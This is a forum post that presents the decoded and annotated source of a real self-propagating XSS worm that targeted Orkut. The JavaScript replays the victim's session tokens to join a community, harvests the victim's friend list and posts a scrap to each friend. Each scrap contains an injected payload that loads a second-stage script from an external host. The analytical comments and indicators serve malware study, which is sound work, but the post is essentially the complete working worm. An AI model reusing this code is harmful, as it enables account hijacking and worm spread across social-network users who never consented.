
Re: List of XSS Worms?

Here is the decoded version of the above Orkut worm:
I guess Rodrigo Lacerda used the following packer to pack the JavaScript — http://dean.edwards.name/packer/ — and then modified it a little.

<--------STARTS HERE---------->

// Worm state shared by the functions below.
// `index` is the position in the harvested friend list (#selectedList);
// it is overwritten at the bottom of the script with the value persisted
// in the "wormdoorkut" cookie, so it may hold a string rather than a number.
var index = 0;
// POST and SIG are read from the page-global JSHDF object and replayed in
// every forged request as POST_TOKEN / signature (see cmm_join and
// sendScrap) — presumably the site's request token and page signature,
// which is why the forged POSTs are accepted as the victim's own actions.
var POST = JSHDF['CGI.POST_TOKEN'];
var SIG = JSHDF['Page.signature.raw'];

/**
 * Returns the first XHR implementation this browser supports, trying the
 * two legacy MSXML ActiveX factories before the native constructor.
 * @returns {object|null} a request object, or null when all three fail.
 */
function createXMLHttpRequest() {
  const factories = [
    () => new ActiveXObject("Msxml2.XMLHTTP"),
    () => new ActiveXObject("Microsoft.XMLHTTP"),
    () => new XMLHttpRequest(),
  ];
  for (const make of factories) {
    try {
      return make();
    } catch (e) {
      // unsupported here; fall through to the next candidate
    }
  }
  return null;
}


/**
 * Writes one cookie through document.cookie.
 * @param {string} name - cookie name, stored verbatim.
 * @param {string} value - stored after the legacy escape() encoding.
 * @param {Date} [expires] - absent/falsy yields a session cookie.
 * @param {string} [path]
 * @param {string} [domain]
 * @param {boolean} [secure] - appends the "secure" attribute when truthy.
 */
function setCookie(name, value, expires, path, domain, secure) {
  const attrs = [name + "=" + escape(value)];
  if (expires) {
    attrs.push("expires=" + expires.toGMTString());
  }
  if (path) {
    attrs.push("path=" + path);
  }
  if (domain) {
    attrs.push("domain=" + domain);
  }
  if (secure) {
    attrs.push("secure");
  }
  document.cookie = attrs.join("; ");
}


/**
 * Reads one cookie value out of document.cookie.
 * Matches `name=` either at the very start of the cookie string or after a
 * "; " separator, so a cookie whose name merely ends with `name` is not
 * matched by accident.
 * @param {string} name
 * @returns {string|false} the unescape()d value, or false when absent.
 */
function getCookie(name) {
  const jar = document.cookie;
  const prefix = name + "=";
  let start;
  const afterSeparator = jar.indexOf("; " + prefix);
  if (afterSeparator !== -1) {
    start = afterSeparator + 2;
  } else if (jar.indexOf(prefix) === 0) {
    start = 0;
  } else {
    return false;
  }
  let stop = jar.indexOf(";", start);
  if (stop === -1) {
    stop = jar.length;
  }
  return unescape(jar.substring(start + prefix.length, stop));
}


/**
 * Expires a cookie by rewriting it with an epoch-era expiry, then reloads
 * the page so the removal is reflected. Does nothing when the cookie is
 * not currently set. Not called anywhere in this script.
 * @param {string} name
 * @param {string} [path]
 * @param {string} [domain]
 */
function deleteCookie(name, path, domain) {
  if (!getCookie(name)) {
    return;
  }
  const attrs = [name + "="];
  if (path) {
    attrs.push("path=" + path);
  }
  if (domain) {
    attrs.push("domain=" + domain);
  }
  attrs.push("expires=Thu, 01-Jan-70 00:00:01 GMT");
  document.cookie = attrs.join("; ");
  history.go(0);
}


// Harvests the victim's contact list. Fetches Compose.aspx (presumably the
// scrap-composer page, requested in the victim's own session so the
// response is personalised), parses the HTML into a detached <div>, takes
// the first <select> found (presumably the recipient picker), drops its
// first <option>, hides it and appends it to the body as #selectedList,
// which sendScrap() then walks entry by entry.
// Any non-200 response makes it call itself again, so the request is
// repeated until it succeeds. For analysts: a hidden <select id="selectedList">
// appended to <body>, plus repeated background GETs of Compose.aspx, are the
// observable traces of this stage.
function loadFriends() {
var xml = createXMLHttpRequest();
if (xml) {
xml.open("GET", "http://www.orkut.com/Compose.aspx", true);
xml.send(null);
// The handler is attached after the first send(); send(null) is then
// issued a second time below.
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status == 200) {var xmlr = xml.responseText;var div = document.createElement("div");div.innerHTML = xmlr;var select = div.getElementsByTagName("select").item(0);if (select) {select.removeChild(select.getElementsByTagName("option").item(0));select.setAttribute("id", "selectedList");select.style.display = "none";document.body.appendChild(select);sendScrap();}} else {loadFriends();}}};
xml.send(null);
}
}


// Silently joins the victim to a community by POSTing the replayed
// POST_TOKEN / signature together with Action.join. The community id in
// the query string is assembled from char codes 52,52,48,48,49,56,49,56,
// i.e. the digits "44001818" — a light obfuscation against plain string
// matching of the URL. A non-200 status triggers an unbounded retry;
// success chains into loadFriends().
// No null check on createXMLHttpRequest() here: in a browser without XHR
// the open() call below throws.
function cmm_join() {
var send = "POST_TOKEN=" + encodeURIComponent(POST) + "&signature=" + encodeURIComponent(SIG) + "&Action.join";
var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/CommunityJoin.aspx?cmm=" + String.fromCharCode(52, 52, 48, 48, 49, 56, 49, 56), true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xml.send(send);
xml.onreadystatechange = function () {if (xml.readyState == 4) {if (xml.status != 200) {cmm_join();return;}loadFriends();}};
}


// Propagation stage: posts one scrap per entry of #selectedList, resuming
// from `index` (loosely compared with the list length, since `index` may be
// the string read back from the cookie).
// The scrap body is the infection vector. Around a Portuguese holiday
// greeting it carries an <embed> whose wmode attribute value is not a plain
// value: the `');` … `escape('` fragments suggest the attribute is reflected
// into a JavaScript string on the recipient's page, where the closing quote
// ends that string and the remainder runs as code — loading
// http://files.myopera.com/virusdoorkut/files/virus.js into <head> (the
// second-stage indicator for analysts). The [silver]<timestamp>[/silver]
// fragment likely just makes each scrap unique. The root cause on the
// site side is missing context-aware encoding of user-supplied markup.
// After each response (status is not checked) the counter is advanced and
// persisted in the "wormdoorkut" cookie. Note getTime() is in milliseconds,
// so "+ 86400" sets an expiry about 86 seconds ahead, not one day.
function sendScrap() {
if (index == document.getElementById("selectedList").length) {
return;
}
var scrapText = "Boas festas de final de ano!<br/><br/>[silver]" + (new Date).getTime() + "[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\" width=\"1\" height=\"1\"></embed>";
var send = "Action.submit=1&POST_TOKEN=" + encodeURIComponent(POST) + "&scrapText=" + encodeURIComponent(scrapText) + "&signature=" + encodeURIComponent(SIG) + "&toUserId=" + document.getElementById("selectedList").item(index).value;
var xml = createXMLHttpRequest();
xml.open("POST", "http://www.orkut.com/Scrapbook.aspx", true);
xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
xml.send(send);
// index++ coerces a string index to a number; recursion continues until
// the list is exhausted.
xml.onreadystatechange = function () {if (xml.readyState == 4) {index++;var wDate = new Date;wDate.setTime(wDate.getTime() + 86400);setCookie("wormdoorkut", index, wDate);sendScrap();}};
}

// Entry point. The "wormdoorkut" cookie is the per-victim progress marker:
// on first run it is created as "0" (expiry ~86 s, see the millisecond note
// in sendScrap), and its value — a string, or false if unset — is then
// copied into `index`. A fresh victim ("0") is first pushed through
// cmm_join(), which itself chains into loadFriends(); a returning victim
// skips straight to loadFriends() -> sendScrap(). Presence of this cookie
// name is a cheap host-side indicator of a compromised session.
if (!getCookie("wormdoorkut")) {
var wDate = new Date;
wDate.setTime(wDate.getTime() + 86400);
setCookie("wormdoorkut", "0", wDate);
}
index = getCookie("wormdoorkut");
if (getCookie("wormdoorkut") == "0") {
cmm_join();
} else {
loadFriends();
}

<--------ENDS HERE---------->


Manish S.
